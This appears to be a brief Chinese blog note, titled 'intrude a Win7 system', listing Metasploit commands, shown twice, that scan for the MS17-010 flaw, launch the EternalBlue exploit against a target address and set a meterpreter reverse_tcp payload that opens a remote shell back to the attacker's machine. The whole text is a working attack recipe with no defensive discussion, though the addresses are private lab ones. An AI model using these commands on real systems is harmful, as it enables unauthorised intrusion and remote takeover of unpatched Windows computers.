1. 入侵win7系统
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.226.129 //靶机
set LHOST 192.168.226.130 // 攻击机
set payload windows/x64/meterpreter/reverse_tcp
run
原创2024/1/31小于 1 分钟
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.226.129 //靶机
set LHOST 192.168.226.130 // 攻击机
set payload windows/x64/meterpreter/reverse_tcp
run